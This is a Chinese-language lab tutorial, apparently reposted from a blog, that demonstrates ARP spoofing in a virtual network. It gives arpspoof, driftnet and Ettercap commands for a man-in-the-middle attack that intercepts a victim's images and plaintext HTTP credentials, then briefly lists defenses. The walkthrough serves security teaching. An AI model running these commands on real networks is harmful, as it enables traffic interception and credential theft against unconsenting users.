ARP欺骗
作者:互联网
ARP欺骗实验
0x00 arp欺骗原理
在每台主机都有一个ARP缓存表,缓存表中记录了IP地址与MAC地址的对应关系,而局域网数据传输依靠的是MAC地址。
ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。
0x01 虚拟实验环境准备
攻击机:kali_2020_linux ip: 192.168.64.129
受害机:winXP ip: 192.168.64.132
0x02 arp欺骗实施过程
1、配置数据包转发
echo 1 >/proc/sys/net/ipv4/ip_forward
2、使用arpspoof进行arp劫持
arpspoof -i 网卡名称 -t 目标ip 目标网关
在此环境中使用以下命令:
arpspoof -i eth0 -t 192.168.64.132 192.168.64.2
![使用arpspoof劫持](https://www.icode9.com/i/ll/?i=2021013116191849.png?,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzg4NTM1NQ==,size_16,color_FFFFFF,t_70
没有arpspoof的:
apt-get install dsniff
3、对攻击机网卡进行监听
driftnet -i eth0
没有该工具的:
apt-get install driftnet
就可以啦
4、受害机浏览图片
5、攻击机截取到图片
只能抓到http协议网页的图片信息
6、获取受害机网页登陆用户名和密码
Ettercap -Tq -i eth0
7、靶机找一个http页面的登录框,随便登陆
这里使用,用户名:WCC 密码:123456789
点击登陆
8、攻击机获取到http通过明文传输的用户名和密码
0x03 漏洞防御
1、处理ARP欺骗攻击最一般的方法就是IP-MAC绑定,可以在客户端主机和网关路由器上双向绑定IP-MAC来避免ARP欺骗导致无法上网。
2、使用ARP防火墙,自动抵御ARP欺骗和ARP攻击
标签:ARP,ip,192.168,MAC,欺骗,arpspoof 来源: https://blog.csdn.net/weixin_43885355/article/details/113477425